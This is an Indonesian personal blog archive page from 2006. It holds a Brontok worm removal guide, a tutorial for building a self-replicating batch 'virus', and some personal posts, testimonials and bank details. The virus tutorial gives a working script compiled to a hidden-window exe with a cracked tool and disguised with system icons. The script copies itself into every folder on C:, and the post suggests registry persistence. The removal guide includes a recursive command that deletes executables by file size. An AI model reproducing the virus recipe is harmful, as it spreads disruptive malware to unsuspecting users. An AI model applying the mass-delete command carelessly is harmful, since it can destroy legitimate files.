Archive
April, 2006
Browsing all articles from April, 2006
Comments Off
Posted April 25, 2006 in Artikel by dimassasongko

Tiga Hari di Jogya…..

Images Tiga Hari di jogyakarta u / keperluan dinas…..capek…naik adam air…..langsung ke purwokerto……………..trus…bla-bla………

Comments Off
Posted April 25, 2006 in Artikel by dimassasongko

Basmi Virus Brontok

Basmi Brontok…..(lagi)
Date: Thursday, April 06, 2006    Hits: 5168    By:  arira   

Kulihat banyak banget yg nulis artikel tentang Brontok, aku ikutan ya….

 

a. Pertama-tama untuk membasmi Brontok aku memerlukan software TuneUp Utilities 2004. Software ini kugunakan untuk mematikan proses dari si virus, caranya buka TuneUp Prosess Explorer trus terminate semua proses yang berikon seperti folder.

b. Buka msconfig (start=>run=>msconfig),pada startup uncheck startup item yg bernama smss, Empty, ElnorB.

c. Buka search , cari file *.exe or *.com , specify size (in KB) isi dg at most 41, when was it modified isi dengan tanggal modifikasi virus (lihat pada properties virus), pada more advanced options pilih search hidden files and folders. Hapus semua file yg dicurigai sbg Brontok.

d. Kemudian buka schedule tasks (pada cmd ketikkan "explorer %windir%\tasks"), delete task yg ada keterangan "At 5:08 PM every….".

e. Buka cmd, kembalikan/delete perubahan yg diakibatkan oleh si virus, ini perintah cmd nya:
-mengenable regedit
"reg delete hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools" -mengenable folder option
"reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer /v nofolderoptions"

f. Untuk mencari dan menghapus file virusnya kita bisa juga gunakan perintah cmd yaitu
for /R %a in (*.exe *.com) do if %~za equ 40085 del "%a" (%a yg terakhir kasih double quote).
Execute perintah diatas pada drive dimana anda menginstall windows, misal drive c.

Keterangan: perintah ini akan mencari semua file .exe dan .com pada directory dan subdirectory dan menghapus diantara mereka yang berukuran 40085 bytes (Brontok yg ada di komputerku berukuran 40085 bytes) yang tidak berattribut hidden, maka berhati-hatilah dalam menggunakan perintah ini jangan sampai salah nulis.

Brontok akan mengkopikan dirinya pada %windir%\shellnew dg nama ElnorB.exe dg attribute hidden, maka hapuslah file itu "attrib –H %windir%\shellnew\elnorb.exe | del %windir%\shellnew\elnorb.exe" (gak pake tanda petik, perintah attrib –H akan menghilangkan atribut hidden pada file ElnorB.exe).

Catatan: laksanakan semua dengan urut. cara ini kugunakan pada windows xp, untuk windows versi lainnya maaf saya tidak tahu….
Maaf kalau tulisan ku ini kurang jelas dalam penyampaiannya.

Terimakasih kepada Allah SWT yg telah memberikan sedikit ilmu padaku, terimakasih pada orang tuaku yg selalu mengirimkan uang bulanan padaku, terimakasih kepada komputerku yg selalu membantuku dalam bermain dan belajar, terimakasih pada semua teman-teman di Akill 118, terimakasih pada seseorang di Klaten, terimakasih pada jasakom yg telah mempublikasikan artikel ini, terimakasih pada para ilmuwan penemu internet, untuk yg bikin Brontok gak usah dikasih ucapan terimakasih….

by

arira
2
Posted April 25, 2006 in Blog by dimassasongko

Bikin Virus Dengan Perintah CMD

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.

Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “

+++++++++++++++++++++++++++++++++++++++++++++++++++
Atas segala penyalahgunaan artikel ini silakan salahkan yg menyalahgunakan

tomPLIX see
tomplixsee (@) yahoo.co.id

Comments Off
Posted April 15, 2006 in Artikel by dimassasongko

::Seminar Internet & Wireless Networking…. MY Concept& Idea…

Logosemkecil Seminar Internet & Wireless Networking …..

Aula USNI , 20 April 2006… it’s my idea & Concept….

Tempat: Kampus USNI Jl.Arteri Pondok Indah No.11 Jak-sel

biaya: Rp.10.000 *(inc.Sertifikat,snack,id card)

info: klik http://smft-usni.tripod.com/seminar.html

or call dimas 021-92630359

Loading

Random Testimonial

  • ~ Bu Tuti & Bu Novi- Rumahteduh.com

    bututi"dimas...thanks ya dah bantu kami membuatkan website & memasarkan kerajinan tangan kami . semoga makin sukses"

  • ~ H. Taufik Hamim Effendi, Lc., MA – Ketua Umum Yayasan Muntada Ahlil Quran(www.muntadaquran.net)

    th"Saya kenal dimas...seingat saya di penghujung tahun 2008 lalu...sejak saat itu silaturrahim saya terus terjalin dengannya walau hanya di dunia maya...seorang yang 'berambisi' untuk meraih ganjaran terbaik dari Allah SWT, yaitu surga-Nya, terbukti di sela-sela kesibukannya...selalu banyak membantu orang lain...saya www.hajimurah.com dan lembaga saya www.muntadaquran.net adalah diantara ajang 'pelampiasan' Dimas untuk bisa beramal shalih... masih banyak tentang kebaikan Dimas...tapi kalo semua saya tulis di sini nanti Dimas jadi GR....wassalam, Taufik Hamim"

  • ~ Tetty Y. Zulkifli – Senior Manager Oriflame MLM

    bunda"Alhamdulillah mas dimas membantu promosi bisnis online saya, dengan layanan cepat, ramah dan memuaskan. Sukses"

  • ~ Istriku – Yang selalu support aku

    foto-tri""suamiku seorang pekerja keras...bahkan aku sering dilupakan ...:) tapi aku support terus untuk kesuksesannnya dan kerja"

  • Read more testimonials »

Sedang Istirahat Coding

Maaf saat ini saya sedang FULL JOB , jadi tidak dapat handle project pembuatan website lagi


Terima Kasih

Donasi & Pembayaran

  • BCABCA
    no.rek 4760733496 an Muhammad Dimas Sasongko,ST
  • Bank MANDIRIBank Mandiri
    no.rek 155-00-0269064-5 an Muhammad Dimas Sasongko,ST
  • BRIBRI
    no.rek 0392-01-001350-50-0 an Muhammad Dimas Sasongko,ST
  • Via Paypal: mdimassasongko@gmail.com

Advertise

Alexa Traffic

Recent Post